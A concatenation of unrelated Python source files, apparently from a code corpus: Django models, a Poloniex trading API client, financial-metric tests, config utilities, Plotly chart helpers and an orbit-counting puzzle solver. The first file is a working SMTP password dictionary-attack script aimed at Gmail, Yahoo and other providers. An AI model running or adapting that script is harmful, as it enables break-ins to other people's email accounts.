# Tested and Developed on Python 2.7 and 3.5 / Configured for Windows, Linux, and Mac
# Strictly For Educational/Ethical Pen Testing Purposes ONLY. I condone no illegal activities with this script
# Use of this code for unlawful purposes is wrong in every sense of the word, a crime, and strictly discouraged
# To help discourage/limit illegal use of this code, advanced functionality of the script has been removed/limited
# All sample dictionary files provided in this repo were 100% legally created and include their own license/disclaimer
# How to use the code:
# python email_dictionary_attack.py
# "target_email" - Email you wish to 'hack'
# "selected_dictionary" - Dictionary located in the dictionaries directory folder you want to use
# "email_service" *Optional - enter only if you have an email we support with a different domain
# (i.e. business email running on gmail, parameter default value is 'gmail.com')
# "port" *Optional - default is 587*
# Usage examples:
# python email_dictionary_attack.py "<EMAIL>" "Top196-probable.txt" "gmail.com" "587"
# or
# python email_dictionary_attack.py "<EMAIL>" "Top196-probable.txt"
import smtplib
import os
import sys
# Email Server Dictionary
available_server_dict ={'gmail.com': 'smtp.gmail.com', 'hotmail.com': 'smtp.live.com',
'live.com': 'smtp.live.com', 'yahoo.com': 'smtp.mail.yahoo.com',
'ymail.com': 'smtp.mail.yahoo.com', 'yahoo.co.uk': 'smtp.mail.yahoo.com',
'sbcglobal.net': 'smtp.mail.att.net', 'prodigy.net': 'smtp.mail.att.net',
'windstream.net': 'smtp.windstream.net', 'comcast.net': 'smtp.comcast.net'}
# OS Specific Parameters
os_system = os.name
if os_system == 'nt':
dict_dir = '\\dictionaries\\'
else:
dict_dir = '/dictionaries/'
# Function to get user name based on inputted email string
def get_server_conn_string(email_string, email_service):
parsed_email_domain = str(email_string.split('@')[1])
if parsed_email_domain in available_server_dict.keys():
smtp_string = available_server_dict[parsed_email_domain]
else:
smtp_string = available_server_dict[email_service]
return smtp_string
# Function to run dictionary attack
def run_dict_attack(target_email, selected_dictionary, email_service='gmail.com', port=587):
server_conn_string = get_server_conn_string(target_email, email_service)
smtpserver = smtplib.SMTP(server_conn_string, port)
smtpserver.ehlo()
smtpserver.starttls()
cwd = os.getcwd()
sel_dict = open(cwd + dict_dir + selected_dictionary, "r")
for word in sel_dict:
try:
smtpserver.login(target_email, word)
print("[*]--------> Success!\n [*]----------> User's Password Determined: " + word)
break
except smtplib.SMTPAuthenticationError:
print("[!]--------> Incorrect Password: " + word)
if __name__ == "__main__":
sys_arg_list = sys.argv
len_sys_arg = len(sys.argv)
print(len_sys_arg)
if len_sys_arg == 3:
run_dict_attack(sys.argv[1], sys.argv[2])
elif len_sys_arg == 4:
run_dict_attack(sys.argv[1], sys.argv[2], sys.argv[3])
elif len_sys_arg == 5:
run_dict_attack(sys.argv[1], sys.argv[2], sys.argv[3], int(sys.argv[4]))
else:
print("[!]--------> Incorrect number of script parameters entered!")
sys.exit(1)
|
StarcoderdataPython
|
93440
|
# coding:utf-8
from django.db import models
# isbn13:9787111013853
class Comment(models.Model):
"""
评论模型
"""
isbn13 = models.CharField(max_length=200,default=None)
author = models.CharField(max_length=200,null=True,blank=True,default=None)
time = models.CharField(max_length=200,null=True,blank=True,default=None)
star = models.IntegerField(default=None)
vote = models.CharField(max_length=200,null=True,blank=True,default=None)
content = models.TextField(default=None)
def __unicode__(self):
return self.isbn13
class Reading(models.Model):
"""
导读模型
"""
isbn13 = models.CharField(max_length=200,default=None)
title = models.TextField(default=None)
note = models.TextField(default=None)
def __unicode__(self):
return self.title
class Review(models.Model):
"""
书评模型
"""
isbn13 = models.CharField(max_length=200, default=None)
title = models.TextField(default=None)
author = models.TextField(default=None)
content = models.TextField(default=None)
def __unicode__(self):
return self.title
|
StarcoderdataPython
|
3274905
|
#!/usr/bin/env python
import urllib
import urllib2
import hashlib
import hmac
import time
import json
import sys
import os.path
class poloniex(object):
_trade_api_url = 'https://poloniex.com/tradingApi'
_public_api_url = 'https://poloniex.com/public'
_dump_file_prefix = 'dump_polo_'
def __init__(self, api_key, api_secret, debug=False):
self.debug = debug
self.api_key = api_key
self.api_secret = api_secret
def _trade_api_query(self, command, params={}):
result = None
try:
dump_filename = poloniex._dump_file_prefix + command + '.json'
if not self.debug or not os.path.exists(dump_filename):
params['command'] = command
params['nonce'] = int(time.time() * 1000.0)
post_data = urllib.urlencode(params)
pd_signed = hmac.new(self.api_secret, post_data, hashlib.sha512).hexdigest()
headers = {
'Key' : self.api_key,
'Sign' : pd_signed
}
req = urllib2.Request(poloniex._trade_api_url, post_data, headers)
doc = urllib2.urlopen(req)
doc_txt = doc.read()
if (self.debug):
dump_file = open(dump_filename, 'w')
dump_file.write(doc_txt)
else:
doc = open(dump_filename, 'r')
doc_txt = doc.read()
result = json.loads(doc_txt)
except Exception as e:
print e
return result
def _public_api_query(self, command, params={}):
result = None
try:
dump_filename = poloniex._dump_file_prefix + command + '.json'
if not self.debug or not os.path.exists(dump_filename):
params['command'] = command
param_str = "?%s" % (urllib.urlencode(params))
doc = urllib2.urlopen(poloniex._public_api_url + param_str)
doc_txt = doc.read()
if (self.debug):
dump_file = open(dump_filename, 'w')
dump_file.write(doc_txt)
else:
doc = open(dump_filename, 'r')
doc_txt = doc.read()
result = json.loads(doc_txt)
except Exception as e:
print e
return result
# {
# "available": "0.23710790",
# "onOrders": "0.00000000",
# "btcValue": "0.23710790"
# }
class balance(object):
def __init__(self, balance_data=None):
self.balance = 0.0
self.on_order = 0.0
self.btc_value = 0.0
if balance_data:
self.balance = float(balance_data[u'available'])
self.on_order = float(balance_data[u'onOrders'])
self.btc_value = float(balance_data[u'btcValue'])
def __repr__(self):
return "balance: %.8f, on_order: %.8f, btc_value: %.8f" % (self.balance, self.on_order, self.btc_value)
def getBalances(self):
balances = None
balance_data = self._trade_api_query('returnCompleteBalances')
if balance_data != None:
balances = {}
for coin, data in balance_data.iteritems():
try:
balance = poloniex.balance(data)
if balance.balance > 0 or balance.on_order > 0:
balances[coin] = balance
except Exception as e:
print e
return balances
def getFeeInfo(self):
print self._trade_api_query('returnFeeInfo')
# {
# "id": 121,
# "last": "6956.95000023",
# "lowestAsk": "6959.00000000",
# "highestBid": "6956.95000026",
# "percentChange": "0.06212977",
# "baseVolume": "71544741.92528193",
# "quoteVolume": "10434.87960817",
# "isFrozen": "0",
# "high24hr": "7281.42800003",
# "low24hr": "6510.14948952"
# }
class market(object):
def __init__(self, currency_pair, currency_data):
self.id = int(currency_data[u'id'])
self.currency_pair = currency_pair
self.last_price = float(currency_data[u'last'])
def __repr__(self):
return "id: %d, currency_pair: %s, last_price: %.8f" % (self.id, self.currency_pair, self.last_price)
def getTicker(self):
ticker = None
try:
ticker_data = self._public_api_query('returnTicker')
if ticker_data:
ticker = {}
for curr_pair, curr_data in ticker_data.iteritems():
try:
mkt, curr = curr_pair.split('_', 2)
mkt_data = poloniex.market(curr_pair, curr_data)
while True:
try:
ticker[mkt][curr] = mkt_data
break
except:
ticker[mkt] = {}
except Exception as e:
print e
except Exception as e:
print "2", e
return ticker
class OrderBook(object):
def __init__(self):
self.bids = []
self.asks = []
def addAsk(self, price, amount):
self.asks.append((round(float(price), 8), round(float(amount), 8)))
def addBid(self, price, amount):
self.bids.append((round(float(price), 8), round(float(amount), 8)))
def getAsks(self):
return self.asks
def getBids(self):
return self.bids
def getOrderBook(self, currency_pair):
order_book = None
params = { u'currencyPair' : currency_pair }
order_book_data = self._public_api_query('returnOrderBook', params)
try:
err_str = order_book_data['error']
print err_str
except:
order_book = poloniex.OrderBook()
for ask in order_book_data[u'asks']:
order_book.addAsk(ask[0], ask[1])
for bid in order_book_data[u'bids']:
order_book.addBid(bid[0], bid[1])
return order_book
if __name__ == '__main__':
polo_key = ''
polo_secret = ''
coin_label = "Coin"
coin_len = len(coin_label)
bal_label = "Balance"
bal_len = len(bal_label)
order_label = "On Order"
order_len = len(order_label)
btc_label = "BTC Value"
btc_len = len(btc_label)
pct_label = "% Index"
pct_len = len(pct_label)
polo = poloniex(polo_key, polo_secret, debug=(1 == 0))
if False:
polo.getFeeInfo()
if False:
ob = polo.getOrderBook("BTC_ETH")
if ob:
print "Asks"
for price, amount in reversed(ob.getAsks()):
print "%11.8f %14.8f" % (price, amount)
print "Bids"
for price, amount in ob.getBids():
print "%11.8f %14.8f" % (price, amount)
print "Spread: %11.8f" % (ob.getAsks()[0][0] - ob.getBids()[0][0])
ob = polo.getOrderBook("ETH_BTC")
usdt_price = None
usdt_label = "USDT Value"
usdt_len = len(usdt_label)
try:
ticker = polo.getTicker()
usdt = ticker[u'USDT'][u'BTC']
usdt_price = usdt.last_price
print usdt_price
except Exception as e:
print e
pass
if (0 == 1) and ticker:
for mkt, currs in ticker.iteritems():
for curr, curr_data in currs.iteritems():
print mkt, curr, curr_data.id, "%.8f" % (curr_data.last_price)
if 0 == 0:
balances = polo.getBalances()
coins = []
btc_total = 0.0
if balances != None:
for coin, balance in balances.iteritems():
btc_total += balance.btc_value
try:
try:
btc_xchg = ticker[u'BTC'][coin].last_price
except Exception as e:
if u'BTC' == coin:
btc_xchg = 1.0
else:
raise e
btc_value = balance.balance * btc_xchg
except:
print coin, "using balance BTC value"
btc_value = balance.btc_value
coin_len = max(coin_len, len(coin))
bal_len = max(bal_len, len("%.8f" % (balance.balance)))
order_len = max(order_len, len("%.8f" % (balance.on_order)))
btc_len = max(btc_len, len("%.8f" % (btc_value)))
if usdt_price:
usdt_len = max(btc_len, len("%.2f" % (btc_value * usdt_price)))
coins.append((coin, balance.balance, balance.on_order, btc_value, 0.0 if not usdt_price else btc_value * usdt_price))
btc_len = max(btc_len, len("%.8f" % (btc_total)))
if usdt_price:
usdt_len = max(btc_len, len("%.2f" % (btc_total * usdt_price)))
if len(balances) > 0:
coins.sort(key=lambda coin: -coin[3])
print "%-*s %-*s %-*s %-*s %-*s %-*s" % (coin_len, coin_label, bal_len, bal_label, order_len, order_label, btc_len, btc_label, usdt_len, usdt_label, pct_len, pct_label)
for coin in coins:
print "%*s %*.8f %*.8f %*.8f %*.2f %*.2f%%" % (coin_len, coin[0], bal_len, coin[1], order_len, coin[2], btc_len, coin[3], usdt_len, coin[4], pct_len - 1, coin[3] / btc_total * 100.0)
print "%*s %*s %*s %*.8f %*.2f %*s" % (coin_len, '', bal_len, '', order_len, '', btc_len, btc_total, usdt_len, 0.0 if not usdt_price else btc_total * usdt_price, pct_len - 1, '')
|
StarcoderdataPython
|
1674271
|
import unittest
from tests import StockMapStub
from stockpy.metrics.finance import roe
from stockpy import expr
from stockpy.filter import horse
class RoeTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
data = {
'n_income_attr_p': {
2019: {
1: 2,
3: 53413057.75
},
2018: {
1: 4,
2: 5,
3: 7,
4: 58366455.95,
},
2017: {
4: 42248863.96,
},
2016: {
4: 32708951.81,
},
2015: {
4: 18219460.42,
},
2014: {
4: 18906255.13,
},
2013: {
4: 14239832.62,
}
},
'total_hldr_eqy_exc_min_int': {
2019: {
1: 318311778.58,
3: 357482918.8
},
2018: {
1: 4,
2: 5,
3: 7,
4: 319545061.05,
},
2017: {
4: 192981208.87,
},
2016: {
4: 162728344.91,
},
2015: {
4: 23332404.42,
},
2014: {
4: 96162944.0,
},
2013: {
4: 77256688.87,
},
2012: {
4: 123016856.25,
}
},
}
cls.stock = StockMapStub(data)
def test_roe_y(self):
m = roe.roe_y()
# n_income_arrt_p(2019.1) / ((total_hldr_eqy_exc_min_int(2018.4)
# +total_hldr_eqy_exc_min_int(2019.1))
# /2)
def run(y, q):
v = m.expr.eval(self.stock, y, 4)
s1 = expr.Get('n_income_attr_p').eval(self.stock, y, q)
s2 = expr.Get('total_hldr_eqy_exc_min_int').eval(self.stock, y, q)
s3 = expr.Get('total_hldr_eqy_exc_min_int').eval(
self.stock, y-1, q)
a = s1/((s2+s3)/2)
print(y, q, a, v)
self.assertEqual(a, v, '{} {}'.format(y, q))
run(2018, 4)
run(2017, 4) # 42248863.96/((192981208.87+162728344.91)/2)
run(2016, 4)
run(2015, 4)
run(2014, 4)
run(2013, 4)
def test_range_roe(self):
# n_income_arrt_p(2019.1) / ((total_hldr_eqy_exc_min_int(2018.4)
# +total_hldr_eqy_exc_min_int(2019.1))
# /2)
def run(y, q):
rm = expr.Range(expr.Before(expr.Get('f_roe_y'), past_year=1),
year_count=6)
nm = self.roe_ge_15_pct_now()
v = rm.eval(self.stock, y, 4)
v2 = expr.Ge(rm, expr.Value(0.15)).eval(self.stock, y, 4)
print('last 6 years', v, v2)
v3 = nm.eval(self.stock, y, q)
print('current', v3, expr.Get('f_roe').eval(self.stock, y, q))
v4 = expr.And(expr.Ge(rm, expr.Value(0.15)),
nm).eval(self.stock, y, q)
print('last 7 years', v4)
run(2019, 3)
m = horse.roe_ge_15_pct_last_7_year()
v = m.eval(self.stock, 2019, 3)
print('last 7 years 2', v)
def roe_ge_15_pct_now(self):
def fv(stock: expr.ExprCtx, year: int, quarter: int):
v = {
4: 0.15,
3: 0.15/4*3,
2: 0.15/4*2,
1: 0.15/4,
}
return v[quarter]
return expr.Ge(
expr.Get('f_roe'),
expr.FuncValue(fv)
)
def test_roe_ttm(self):
m = roe.roe_ttm()
# n_income_arrt_p(2019.1) / ((total_hldr_eqy_exc_min_int(2018.4)
# +total_hldr_eqy_exc_min_int(2019.1))
# /2)
v = m.expr.eval(self.stock, 2019, 1)
s1 = expr.Get('f_income_attr_p_ttm').eval(self.stock, 2019, 1)
s2 = expr.Get('total_hldr_eqy_exc_min_int').eval(self.stock, 2019, 1)
s3 = expr.Get('total_hldr_eqy_exc_min_int').eval(self.stock, 2018, 1)
self.assertEqual(s1/(s2+s3)*2, v)
|
StarcoderdataPython
|
3289706
|
<reponame>serrabaum/Python-Baseball
import pytest
import matplotlib
matplotlib.use('Agg')
from .utils import get_assignments, get_calls
from stats import offense
@pytest.mark.test_select_all_plays_module4
def test_select_all_plays_module4():
assert 'games' in dir(offense), 'Have you imported `games` from `data`?'
assert 'plays:games:games:type:play' in get_assignments(offense), 'Select the `play` rows of the `games` DataFrame.'
assert 'plays:columns:type:inning:team:player:count:pitches:event:game_id:year' in get_assignments(offense), 'Set the correct column labels of the `games` DataFrame.'
@pytest.mark.test_select_only_hits_module4
def test_select_only_hits_module4():
assert 'hits:plays:loc:plays:event:str:contains:^(?:S(?!B)|D|T|HR):inning:event' in get_assignments(offense), 'Refine the `games` DataFrame to contain only hits. Store the new DataFrame in a variable called `hits`.'
@pytest.mark.test_convert_column_type_module4
def test_convert_column_type_module4():
assert 'hits:loc:None:None:None:inning:pd:to_numeric:hits:loc:None:None:None:inning' in get_assignments(offense), 'Change the data type of the `inning` column to numeric.'
@pytest.mark.test_replace_dictionary_module4
def test_replace_dictionary_module4():
assert 'replacements:^S(.*):^D(.*):^T(.*):^HR(.*):single:double:triple:hr' in get_assignments(offense), '`replacements` is not a dictionary, doesn\'t exist, or contains the wrong values.'
@pytest.mark.test_replace_function_module4
def test_replace_function_module4():
assert 'hit_type:hits:event:replace:replacements:regex:True' in get_assignments(offense), 'The `replace()` function is not used to replace the event column with the correct hit type.'
@pytest.mark.test_add_a_new_column_module4
def test_add_a_new_column_module4():
assert 'hits:hits:assign:hit_type:hit_type' in get_assignments(offense), 'The new `hit_type` column has not been assign to the `hits` DataFrame.'
@pytest.mark.test_group_by_inning_and_hit_type_module4
def test_group_by_inning_and_hit_type_module4():
assert 'hits:hits:groupby:inning:hit_type:size:reset_index:name:count' in get_assignments(offense), 'The `hits` DataFrame is not properly grouped.'
@pytest.mark.test_convert_hit_type_to_categorical_module4
def test_convert_hit_type_to_categorical_module4():
assert 'hits:hit_type:pd:Categorical:hits:hit_type:single:double:triple:hr' in get_assignments(offense), 'The `hit_type` column is not `Categorical`.'
@pytest.mark.test_sort_values_module4
def test_sort_values_module4():
assert 'hits:hits:sort_values:inning:hit_type' in get_assignments(offense), 'The `hits` DataFrame has not been sorted by `inning`.'
@pytest.mark.test_reshape_with_pivot_module4
def test_reshape_with_pivot_module4():
pivot = False
index = False
columns = False
values = False
for string in get_assignments(offense):
if 'hits:hits:pivot' in string:
pivot = True
if 'index:inning' in string:
index = True
if 'columns:hit_type' in string:
columns = True
if 'values:count' in string:
values = True
assert pivot, 'Are you calling `pivot()` on the `hits` DataFrame?'
assert index, 'Does the call to `pivot()` have a keyword argument of `index` set to `\'inning\'`?'
assert columns, 'Does the call to `pivot()` have a keyword argument of `columns` set to `\'strike_outs\'`?'
assert values, 'Does the call to `pivot()` have a keyword argument of `values` set to `\'count\'`?'
@pytest.mark.test_stacked_bar_plot_module4
def test_stacked_bar_plot_module4():
assert 'hits:plot:bar:stacked:True' in get_calls(offense), 'A stacked bar chart has not been plotted.'
assert 'plt:show' in get_calls(offense), 'The plot has not been shown.'
|
StarcoderdataPython
|
1638475
|
def get_config_file():
import os
path = os.path.abspath(__file__)
f = os.path.join(os.path.dirname(path), 'setup.cfg.tpl')
return open(f).read()
|
StarcoderdataPython
|
3264852
|
<reponame>figtools/figgy-cli<filename>src/figcli/extras/key_utils.py
import re
from typing import Set, Dict
from figcli.config import *
class KeyUtils(object):
@staticmethod
def find_all_expected_names(config_keys: set, shared_names: set, merge_conf: dict,
repl_conf: dict, repl_from_conf: dict, namespace: str) -> Set[str]:
"""
From various sets of keys and configs, calculates all required PS Names (keys) this application requires.
Args:
config_keys: set -> representing the app_figs in the passed in figgy.json file
shared_names: set -> representing the shared_figs in the passed in figgy.json file
merge_conf: dict -> representing the merged_figs in the passed in figgy.json file
repl_conf: dict -> representing the replicate_figs in the figgy.json file
repl_from_conf: dict -> represents the `replicate_from` config block in the figgy.json file
namespace: parsed, or calculated namespace for the application being synced. E.G. /app/demo-time/
Returns: Set[str] -> All PS Names that have been defined as dependencies for this application's deployment
"""
merge_keys = set(merge_conf.keys())
all_keys = config_keys | shared_names | merge_keys
for merge_key, merge_val in merge_conf.items():
if type(merge_val) == list:
for val in merge_val:
if KeyUtils.sanitize(val).startswith(namespace):
all_keys.add(KeyUtils.sanitize(val))
elif type(merge_val) == str:
matches = re.findall('\${([\w/-]+)}', merge_val)
for match in matches:
if match.startswith(namespace):
all_keys.add(KeyUtils.sanitize(match))
for key in repl_conf:
all_keys.add(repl_conf[key])
source_ns = repl_from_conf.get(SOURCE_NS_KEY)
params = repl_from_conf.get(PARAMETERS_KEY)
if source_ns and params:
for param in params:
all_keys.add(f'{namespace}{param}')
return all_keys
@staticmethod
def merge_repl_and_repl_from_blocks(repl_conf: Dict, repl_from: Dict, dest_namespace: str) -> Dict:
"""
Parses the repl_from block and merges it into the standard 'replication' block. This simplifies
configuring replication and detecting strays.
Args:
repl_conf: Dict representing the `replicate_figs` block in figgy.json file
repl_from: Dict representing the `replicate_frorm` block in figgy.json file
dest_namespace: namespace found in the `figgy.json` file. Where replication is destined for.
Returns: an updated repl_conf dictionary with repl_from figcli.configs merged into it.
"""
source_ns = repl_from.get(SOURCE_NS_KEY)
params = repl_from.get(PARAMETERS_KEY)
dest_namespace = dest_namespace if dest_namespace.endswith('/') else f'{dest_namespace}/'
if source_ns and params:
source_ns = source_ns if source_ns.endswith('/') else f'{source_ns}/'
for param in params:
repl_conf[f'{source_ns}{param}'] = f'{dest_namespace}{param}'
return repl_conf
@staticmethod
def sanitize(merge_val):
return merge_val.replace("${", "").replace("}", "").replace(merge_uri_suffix, "")
@staticmethod
def desanitize(merge_val):
return "${" + merge_val + "}"
|
StarcoderdataPython
|
3381939
|
<filename>src/analyticViz/viz.py
import plotly.express as px
import plotly.figure_factory as ff
"""
This is a script that contains functions needed for plotting various visualizations using plotly
The various viz includes;
* Bar Chart (Horizontal)
* Bar Chart (Vertical)
* Stacked bar chart
* Clustered bar chart
* Pie Chart
* Histogram
* Box plots
* Facet row plots
* Sunburst
* Violin Plot
"""
def Vbar(data, x_col, y_col, text, title=None, x_title=None, y_title=None, color=None, mode=None):
"""
Function that plots a vertical bar chart
Args:
data: dataframe - pandas dataframe
x_col: str - column in the dataframe to be plotted on the x-axis
y_col: str - column in the dataframe to be plotted on the y-axis
text: str - column name to be used as text display on the bar chart
title: str - text to be displyed as title for the plot
x_title: str - text to be displayed on the x-axis
y_title: str - text to be displayed on the y-axis
color: str - column name that you want stacked
mode: str - indicate whether stacked or group(side by side plot)
Returns:
fig: plot - bar plot to be displayed
"""
# plot bar chart
fig = px.bar(data, x=x_col, y=y_col, text=text, color=color, barmode=mode, color_discrete_sequence=px.colors.qualitative.D3)
# edit contents of bar chart
fig.update_traces(texttemplate='%{text:.1s}', textposition='outside', cliponaxis=False,
textfont={'family':"Arial",'size': 13,'color': "black"})
# edit outline of bar chart
fig.update_xaxes(title_text=x_title, automargin=True, categoryorder='total ascending', type='category')
fig.update_yaxes(title_text=y_title, automargin=True)
fig.update_layout(title_text=title, yaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)',
title_x=0.5,uniformtext_minsize=5)
return fig.show()
def Hbar(data, x_col, y_col, text, title=None, x_title=None, y_title=None, color=None, f_col=None, f_row=None):
"""
Function that plots a horizontal bar chart
Args:
data: dataframe - pandas dataframe
x_col: str - column in the dataframe to be plotted on the x-axis
y_col: str - column in the dataframe to be plotted on the y-axis
text: str - column name to be used as text display on the bar chart
title: str - text to be displyed as title for the plot
x_title: str - text to be displayed on the x-axis
y_title: str - text to be displayed on the y-axis
color: str - column name that you want stacked
Returns:
fig: plot - bar plot to be displayed
"""
# plot bar chart
fig = px.bar(data, x=x_col, y=y_col, text=text, orientation='h', color=color,
facet_col=f_col, facet_row=f_row, color_discrete_sequence=px.colors.qualitative.D3)
# edit contents of bar chart
fig.update_traces(texttemplate='%{text:.1s}', textposition='outside', cliponaxis=False,
textfont={'family':"Arial",'size': 13,'color': "black"})
# edit outline of bar chart
fig.update_xaxes(title_text=x_title, automargin=True)
fig.update_yaxes(title_text=y_title, automargin=True, categoryorder='total ascending', type='category')
fig.update_layout(title_text=title, xaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)',
title_x=0.5, uniformtext_minsize=5)
return fig.show()
def pie(data, values, labels, title=None):
"""
Function that plots a pie chart
Args:
data: dataframe - pandas dataframe
values: str - column in the dataframe representing numeric values
labels: str - column in the dataframe representing categorical values
title: str - text to be displyed as title for the plot
Returns:
fig: plot - pie chart to be displayed
"""
# plot pie chart
fig = px.pie(data, values=values, names=labels, title=title, hole=0.6, color_discrete_sequence=px.colors.qualitative.D3)
# edit pie chart
fig.update_traces(hoverinfo='label+value', textfont_size=12, marker=dict(line=dict(color='#000000', width=0.5)))
fig.update_layout(autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.46, uniformtext_minsize=5)
return fig.show()
def hist(data, x_col, title, plot_type, color=None, f_col=None, f_row=None):
"""
Function that plots a histogram
Args:
data: dataframe - pandas dataframe
x_col: str - column in the dataframe representing numeric values
title: str - text to be displyed as title for the plot
plot_type: str - indcates which additional plot you need (box, violin, rug)
color: str - column name to be used for multiple histograms
Returns:
fig: plot - histogram to be displayed
"""
# plot graph
fig = px.histogram(data, x=x_col, marginal=plot_type, color=color, hover_data=data.columns,
facet_col=f_col, facet_row=f_row, color_discrete_sequence=px.colors.qualitative.D3)
# update or edit graph
fig.update_layout(autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.46, uniformtext_minsize=5,
yaxis=dict(visible=False), title_text = title)
return fig.show()
def scatter(data, x_col, y_col, title=None, x_title=None, y_title=None, color=None, size=None, render=None, f_col=None, f_row=None):
"""
Function that plots a scatter plot
Args:
data: dataframe - pandas dataframe
x_col: str - column in the dataframe representing numeric values
y_col: str - column in the dataframe representing numeric values
title: str - text to be displyed as title for the plot
x_title: str - text to be displayed on the x-axis
y_title: str - text to be displayed on the y-axis
size: str - column name to size points with
color: str - column name to be used for multiple histograms
render: str - how to render the viz (webgl or svg)
Returns:
fig: plot - histogram to be displayed
"""
# plot graph
fig = px.scatter(data, x=x_col, y=y_col, color=color, size=size, render_mode=render,
facet_col=f_col, facet_row=f_row, color_discrete_sequence=px.colors.qualitative.D3)
# edit graph
fig.update_xaxes(title_text=x_title, automargin=True)
fig.update_yaxes(title_text=y_title, automargin=True)
fig.update_traces(marker=dict(line=dict(width=1.5, color='DarkSlateGrey')), selector=dict(mode='markers'))
fig.update_layout(title_text=title, autosize=False, plot_bgcolor='rgba(0,0,0,0)',
title_x=0.5, uniformtext_minsize=5)
return fig.show()
def line(data, x_col, y_col, x_title=None, y_title=None, title=None, color=None, f_col=None, f_row=None):
"""
Function that plots a line charts
Args:
data: dataframe - pandas dataframe
x_col: str - column in the dataframe representing date values(year, month, day, week, date, datetime)
y_col: str - column in the dataframe representing numeric values
title: str - text to be displyed as title for the plot
x_title: str - text to be displayed on the x-axis
y_title: str - text to be displayed on the y-axis
color: str - column name to be used for multiple line plots
Returns:
fig: plot - line plot to be displayed
"""
# plot line chart
fig = px.line(data, x=x_col, y=y_col, color=color, markers=True, facet_col=f_col, facet_row=f_row,
color_discrete_sequence=px.colors.qualitative.D3)
# edit line chart
fig.update_layout(title_text=title, yaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.5, uniformtext_minsize=5)
return fig.show()
def sun(data, path, value, title=None):
"""
Function that plots a sunburst chart(pie)
Args:
data: dataframe - pandas dataframe
value: str - column in the dataframe representing numeric values
path: list - list of column names in the dataframe representing categorical values
title: str - text to be displyed as title for the plot
Returns:
fig: plot - sunburst chart to be displayed
"""
# plot chart
fig = px.sunburst(data, path=path, values=value, color_discrete_sequence=px.colors.qualitative.D3)
#edit chart
fig.update_traces(hoverinfo='label+value', textfont_size=12, marker=dict(line=dict(color='#000000', width=0.5)))
fig.update_layout(title_text=title, autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.46, uniformtext_minsize=5)
return fig.show()
def table(data, index=None):
"""
Function that converts pandas dataframe to plotly dataframe
Args:
data: dataframe - pandas dataframe
index: bool - indicates if you want index to show or not
Returns:
fig: plot - formatted plotly table
"""
# plot table
colorscale = [[0, '#1779bd'],[.5, '#d2e8f7'],[1, '#ffffff']]
fig = ff.create_table(data, index=index, colorscale=colorscale)
return fig.show()
def box(data, x_col, y_col, title=None, x_title=None, y_title=None, color=None, f_col=None, f_row=None):
"""
Function that plots a box plot
Args:
data: dataframe - pandas dataframe
x_col: str - column in the dataframe representing categorical values
y_col: str - column in the dataframe representing numerical values
title: str - text to be displyed as title for the plot
x_title: str - text to be displayed on the x-axis
y_title: str - text to be displayed on the y-axis
color: str - column name to be used for multiple box plots
Returns:
fig: plot - box plot to be displayed
"""
# plot box plot
fig = px.box(data, x=x_col, y=y_col, color=color, color_discrete_sequence=px.colors.qualitative.D3, notched=True,
facet_col=f_col, facet_row=f_row)
# edit plot
fig.update_xaxes(title_text=x_title, automargin=True)
fig.update_yaxes(title_text=y_title, automargin=True)
fig.update_layout(title_text=title, yaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)',
title_x=0.46, uniformtext_minsize=5)
return fig.show()
def violin(data, x_col, y_col, title=None, x_title=None, y_title=None, color=None, f_col=None, f_row=None):
"""
Function that plots a violin plot
Args:
data: dataframe - pandas dataframe
x_col: str - column in the dataframe representing categorical values
y_col: str - column in the dataframe representing numerical values
title: str - text to be displyed as title for the plot
x_title: str - text to be displayed on the x-axis
y_title: str - text to be displayed on the y-axis
color: str - column name to be used for multiple box plots
Returns:
fig: plot - violin plot to be displayed
"""
# plot box plot
fig = px.violin(data, x=x_col, y=y_col, color=color, color_discrete_sequence=px.colors.qualitative.D3, box=True,
facet_col=f_col, facet_row=f_row)
# edit plot
fig.update_xaxes(title_text=x_title, automargin=True)
fig.update_yaxes(title_text=y_title, automargin=True)
fig.update_layout(title_text=title, yaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)',
title_x=0.46, uniformtext_minsize=5)
return fig.show()
|
StarcoderdataPython
|
3270810
|
def parse_relationship(string):
"""Parses relationship from string of format A)B where A is the parent and
B is the child.
Args:
original string
Returns:
Parent, Child: string, string
"""
parsed = string.strip().split(')')
return parsed[0], parsed[1]
def get_input_str(filename):
"""returns list of inputs from data file.
Args:
filename: the name of the file with the input data.
Returns:
a list of strings read from the file
"""
text_file = open(filename, "r")
input_strs = text_file.readlines()
text_file.close()
return input_strs
class Planet:
"""A planet - linked list - with name, parent, children, and count of the
number of planets it orbits (that come between it and the base planet)
"""
def __init__(self, name, parent=None):
self.name = name
self.parent = parent
self.count = None
self.children = []
def set_count(self):
if self.parent != None:
self.count = self.parent.count +1
else:
self.count = 0
def set_parent(self, parent):
self.parent = parent
def add_child(self, child):
self.children.append(child)
def build_tree(instructions):
"""builds a tree based on the instructions passed. Instructions expected to
be a list of strings in the form parent)child.
"""
first_name, _ = parse_relationship(instructions[0])
first_planet = Planet(name=first_name, parent=None)
planets = [first_planet]
for instruction in instructions:
parent_name, child_name = parse_relationship(instruction)
# initialize next_planet and parent
next_planet = None
parent = None
# search for existing planet or parent
for planet in planets:
if planet.name == parent_name:
parent = planet
elif planet.name == child_name:
next_planet = planet
# if no existing planet or parent, make them, and add to planet list
if parent == None:
parent = Planet(name=parent_name)
planets.append(parent)
if next_planet == None:
next_planet = Planet(name=child_name)
planets.append(next_planet)
# add parent to the next planet
next_planet.set_parent(parent)
# add next planet to parent's children
parent.add_child(next_planet)
return planets
def set_orbit_counts(planets):
"""sets the orbit counts by finding base planet and traversing the tree,
setting the counts from root to leaf.
"""
base_planet = None
# find base planet
for planet in planets:
if planet.parent == None:
base_planet = planet
break
# traverse tree setting count
base_planet.set_count()
planet = base_planet
s = []
s.append(planet)
while len(s) > 0:
planet = s.pop()
planet.set_count()
if planet.children != None:
for child in planet.children:
s.append(child)
def count_orbits(planets):
"""counts(sums) the number of orbits from all planets
"""
set_orbit_counts(planets)
count = 0
for planet in planets:
count += planet.count
return count
def main():
lines = get_input_str('day6_input.txt')
planets = build_tree(lines)
